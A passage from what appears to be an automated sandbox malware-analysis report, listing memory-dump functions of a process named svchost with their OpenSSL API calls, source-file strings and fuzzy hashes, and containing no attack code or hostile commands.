                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_pushR_newR_set_debugR_set_errormemcpy
                                                                                              • String ID: P$ciphersuite_cb$ssl\ssl_ciph.c
                                                                                              • API String ID: 69574139-1019853614
                                                                                              • Opcode ID: 261f1c169834f3b248e3fcf4ba54e383dab0ddf77f8d43070ce3eaaf034a2cc3
                                                                                              • Instruction ID: 2c4a0a240721f57cc93091e9fa031a925783edc0bfd13c8a9fa17e57e0690e98
                                                                                              • Opcode Fuzzy Hash: 261f1c169834f3b248e3fcf4ba54e383dab0ddf77f8d43070ce3eaaf034a2cc3
                                                                                              • Instruction Fuzzy Hash: AA11B4E1F4E54292FA62A735E8873BE5351AF48784F50C536ED6C427F6EE2CE5088700
                                                                                              Function 00007FFBAB486810 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$memcmp
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_renegotiate
                                                                                              • API String ID: 4071200903-75546675
                                                                                              • Opcode ID: 4e429b41bcfbe82b30b0e688d5619eabcadb87baebd6f48d83b1b1b919c85ab4
                                                                                              • Instruction ID: 58dc67bc9726b1aefc7556430ce05061384d5f1b400bb0ee869c0b028c7edc0c
                                                                                              • Opcode Fuzzy Hash: 4e429b41bcfbe82b30b0e688d5619eabcadb87baebd6f48d83b1b1b919c85ab4
                                                                                              • Instruction Fuzzy Hash: 352180E1B4B68291FB929BB1E8523B81350EB44B80F54C432DE2D477A2DE3CE9D58310
                                                                                              Function 00007FFBAB41C9E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_new_nullL_sk_pushR_newR_set_debugR_set_errorX509_up_ref
                                                                                              • String ID: ssl\ssl_cert.c$ssl_cert_add0_chain_cert
                                                                                              • API String ID: 3689422639-2634322016
                                                                                              • Opcode ID: 44b6193324a3d4cf3e721394ce85266bc517458d67d2a7f9dc9f744984ca31a1
                                                                                              • Instruction ID: 243c9a6bf0ed503dedde43a2440a4bc1133e5be809bdfb7d604acd2d89e796a3
                                                                                              • Opcode Fuzzy Hash: 44b6193324a3d4cf3e721394ce85266bc517458d67d2a7f9dc9f744984ca31a1
                                                                                              • Instruction Fuzzy Hash: 8F1193A1F0F65281FA57DB31E8523BD6290EF44BC4F188432DE2D477A6DE2CE8458700
                                                                                              Function 00007FFBAB42C360 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C38E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3A6
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3B7
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3D0
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3E8
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,00007FFBAB429B10,?,00007FFBAB412E95), ref: 00007FFBAB42C3F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error
                                                                                              • String ID: can_renegotiate$ssl\ssl_lib.c
                                                                                              • API String ID: 1552677711-867855671
                                                                                              • Opcode ID: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                              • Instruction ID: f68b2c463b98bc7d5c3d8f77602f143909f492f838fc99bd6b736600a5d7c18e
                                                                                              • Opcode Fuzzy Hash: 3a1675180e72825a1a9c0467388758be2d6c99f26fcfcb73c7b2ad0611180d60
                                                                                              • Instruction Fuzzy Hash: B2111BA2A4A54282F796E736C8827FD2351EB50740F909435DD2C826F2DE2CE59A9601
                                                                                              Function 00007FFBAB4669F3 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Len: %llu$ Offset: %llu$Crypto
                                                                                              • API String ID: 3964688267-430340682
                                                                                              • Opcode ID: a599dc20fec591ff140dff86ef44d1bb6b4f5833528ccddc5ea2a086fa4e5926
                                                                                              • Instruction ID: ab69667562d7a909dd00c414538e52e8ec907af27231532dfc0d314d597b8598
                                                                                              • Opcode Fuzzy Hash: a599dc20fec591ff140dff86ef44d1bb6b4f5833528ccddc5ea2a086fa4e5926
                                                                                              • Instruction Fuzzy Hash: 4F015AE1A4A65380FE26DB75E8513FD1750AF45794F449036DE2E072A6DE3CE0868200
                                                                                              Function 00007FFBAB4669A5 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_printfO_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$ App Protocol Error Code: %llu$ Stream id: %llu$Stop sending
                                                                                              • API String ID: 3964688267-1785104151
                                                                                              • Opcode ID: 8554a91a66266b5c025effea9843182e4f2e52f216936860ac81f87ff0741d91
                                                                                              • Instruction ID: 9ed93efcd590c460aa28d21e48070c5186a0e3df5efaa0c5c46accef2d82c332
                                                                                              • Opcode Fuzzy Hash: 8554a91a66266b5c025effea9843182e4f2e52f216936860ac81f87ff0741d91
                                                                                              • Instruction Fuzzy Hash: 67012CE1E4A64390FE26DB75E8613FD1760AF45794F449036DE2E472A5DE3CE1868300
                                                                                              Function 00007FFBAB45E440 Relevance: 13.6, APIs: 9, Instructions: 128COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_peek_last_error.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB44F9FC), ref: 00007FFBAB45E63C
                                                                                              • ERR_pop_to_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB44F9FC), ref: 00007FFBAB45E64C
                                                                                              • ERR_clear_last_mark.LIBCRYPTO-3-X64(?,?,?,?,00007FFBAB44F9FC), ref: 00007FFBAB45E653
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_clear_last_markR_peek_last_errorR_pop_to_mark
                                                                                              • String ID:
                                                                                              • API String ID: 4503806-0
                                                                                              • Opcode ID: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                              • Instruction ID: cb69f4b31d75c754e6bab0a758118b578079749dbfaee3efc980aaee292f7e94
                                                                                              • Opcode Fuzzy Hash: 1653e883ae788b22098aff78b098f66b5393b0d98448a3d5c585c9e523f4069e
                                                                                              • Instruction Fuzzy Hash: 5E511962B4AF8582E661DB25E84067E73A4FF49B84F448235EE7D437A9EF38D805C700
                                                                                              Function 64945710 Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: EventHandleInformation
                                                                                              • String ID:
                                                                                              • API String ID: 943243487-0
                                                                                              • Opcode ID: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                                                                                              • Instruction ID: c02d53f5b47e4eab209d974f5deb7cec8a0e804993d913822503880e7c3ff0c7
                                                                                              • Opcode Fuzzy Hash: 0abebdb6bbe18b6591d2f169ee2d49ccc49482f9618223d758f2abb39a9272bf
                                                                                              • Instruction Fuzzy Hash: 1C41B232682640CAEB55CF75D8003696B65EB86FBCF144225CF2E8B395EF39C145C710
                                                                                              Function 649447F0 Relevance: 13.6, APIs: 9, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                                                                                              • String ID:
                                                                                              • API String ID: 2941551293-0
                                                                                              • Opcode ID: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                                                                                              • Instruction ID: 9b255bf73e60d4f51aa72ff79eaf3e3afad282202bf316635f7d93ce8b392ba6
                                                                                              • Opcode Fuzzy Hash: 41f481ae3904839b845b6b966e47d7c0d9084ec4171bca2e1ba02052f09d8d33
                                                                                              • Instruction Fuzzy Hash: C441B0353D664086FB09DFB0F86036933AAFB85B6CF454525CE0A42794EF39C495CB61
                                                                                              Function 64944560 Relevance: 13.6, APIs: 9, Instructions: 74COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • TlsGetValue.KERNEL32 ref: 6494457C
                                                                                                • Part of subcall function 649444D0: __iob_func.MSVCRT ref: 64944501
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value__iob_func
                                                                                              • String ID:
                                                                                              • API String ID: 2820842585-0
                                                                                              • Opcode ID: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                                                                                              • Instruction ID: 16148a25f4b476eea67aa2965a04ab47484b3a23098f2b50d2a6f1ecfa518ab3
                                                                                              • Opcode Fuzzy Hash: 0546eda2f010a2ff3f3b1f8a39091f3d6a25e4e9caee43d900f00acf19f6acdb
                                                                                              • Instruction Fuzzy Hash: 62316F716916408BFB259F71F80835B77A5F709BA8F140229CEAA477A0DF3DD059CB20
                                                                                              Function 00007FFBAB4820A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 174COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482281
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482299
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB4822ED
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482329
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFBAB47C75A), ref: 00007FFBAB482341
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug
                                                                                              • String ID: custom_ext_add$ssl\statem\extensions_cust.c
                                                                                              • API String ID: 476316267-2598430110
                                                                                              • Opcode ID: 848f00409a266f594c879187554ee4d88aa2be5f85c54d266ad7c43225f7afad
                                                                                              • Instruction ID: a759c5150b031b84bc21c3f57d9a75e55366dca9658a6f96ba4e3d529ba0ff75
                                                                                              • Opcode Fuzzy Hash: 848f00409a266f594c879187554ee4d88aa2be5f85c54d266ad7c43225f7afad
                                                                                              • Instruction Fuzzy Hash: 9361E6B1B0A69281E6668FB2E444B7A63A4FB95B80F06C135DEAD4B7A5DF3CD001C701
                                                                                              Function 00007FFBAB44020F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 101COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_indentO_printf
                                                                                              • String ID: NamedGroup: %s (%d)$UNKNOWN$key_exchange:
                                                                                              • API String ID: 1860387303-3646068821
                                                                                              • Opcode ID: 76076dc7cee3309c7be2a97947ebada04c6fc20c947832e566ac27cf6c87ad81
                                                                                              • Instruction ID: 0d07cbbab948d8bd6f4c98e0554ed26f713ed5f299f42f75122475756cdae1a8
                                                                                              • Opcode Fuzzy Hash: 76076dc7cee3309c7be2a97947ebada04c6fc20c947832e566ac27cf6c87ad81
                                                                                              • Instruction Fuzzy Hash: 0B41CFB1B1A2D282EA2BCB71D4255B96F51FB41780F05C032CEAD177A2DE3CE962D700
                                                                                              Function 00007FFBAB45B050 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: E_saveR_newR_set_debugR_set_error
                                                                                              • String ID: ossl_quic_port_raise_net_error$port failed due to network BIO I/O error$ssl\quic\quic_port.c
                                                                                              • API String ID: 3894926980-3295190829
                                                                                              • Opcode ID: a3e48a23d0d733174729af938e87b6f5c4ec20c892d9b2cf3c151f03377176a7
                                                                                              • Instruction ID: 3edaa611b67ed9f7856c343b9f17dcd1abad358f0446c6655e8eb64781a58971
                                                                                              • Opcode Fuzzy Hash: a3e48a23d0d733174729af938e87b6f5c4ec20c892d9b2cf3c151f03377176a7
                                                                                              • Instruction Fuzzy Hash: 8741B0A2A0AB8142EBA2CF35D550779A791AF45BD4F04D331DEAD07BF5CE2DE8408700
                                                                                              Function 00007FFBAB486910 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_parse_ctos_server_cert_type
                                                                                              • API String ID: 193678381-2874584118
                                                                                              • Opcode ID: a2549dc68999e34ea9f448f7e483aa40c5777b7ca2383bf67dbbf2072c0924f3
                                                                                              • Instruction ID: a595a9ad6c74713a08f2f9b7883eba7d2dbc0ec807663c22be118cd541373aa9
                                                                                              • Opcode Fuzzy Hash: a2549dc68999e34ea9f448f7e483aa40c5777b7ca2383bf67dbbf2072c0924f3
                                                                                              • Instruction Fuzzy Hash: 1421BDE1A1A68281FA52DBB5D4513B923A0EF50784F00D035EEAD476F6EF2CE585C341
                                                                                              Function 00007FFBAB476EB0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$L_cleanse
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_release_record
                                                                                              • API String ID: 4083992426-1180888099
                                                                                              • Opcode ID: ce6f5598b709bcca41bbea653c1372b02795b9d4b4eeceb60e7cf642e6725302
                                                                                              • Instruction ID: f0e12c54d20e45821364d56a32877272944d10a5826e2df44bae82c9fa3f038b
                                                                                              • Opcode Fuzzy Hash: ce6f5598b709bcca41bbea653c1372b02795b9d4b4eeceb60e7cf642e6725302
                                                                                              • Instruction Fuzzy Hash: E73193A1E1A68281F7629B25E5443BC2361EF40784F548532EE2D47AB9CF3CE4D6C340
                                                                                              Function 00007FFBAB4988DF Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 59COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_clear_flagsO_set_flagsR_newR_set_debugR_vset_error
                                                                                              • String ID: $ossl_statem_server_read_transition$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 3455785776-558299289
                                                                                              • Opcode ID: 5309a46375283aba9f8edbf05b48b0ae9d144b1539daf3d949c8e52d03f0505f
                                                                                              • Instruction ID: 92cec74b9b303d5b90300ec7fdd6cfd63411e36d02e1e91ed1a0c92677d2bbdd
                                                                                              • Opcode Fuzzy Hash: 5309a46375283aba9f8edbf05b48b0ae9d144b1539daf3d949c8e52d03f0505f
                                                                                              • Instruction Fuzzy Hash: 992181B1F0A14646FBA69B79D4813BD2791EF80784F488035CE6C4A6E6CF7DD8C58311
                                                                                              Function 00007FFBAB480A40 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
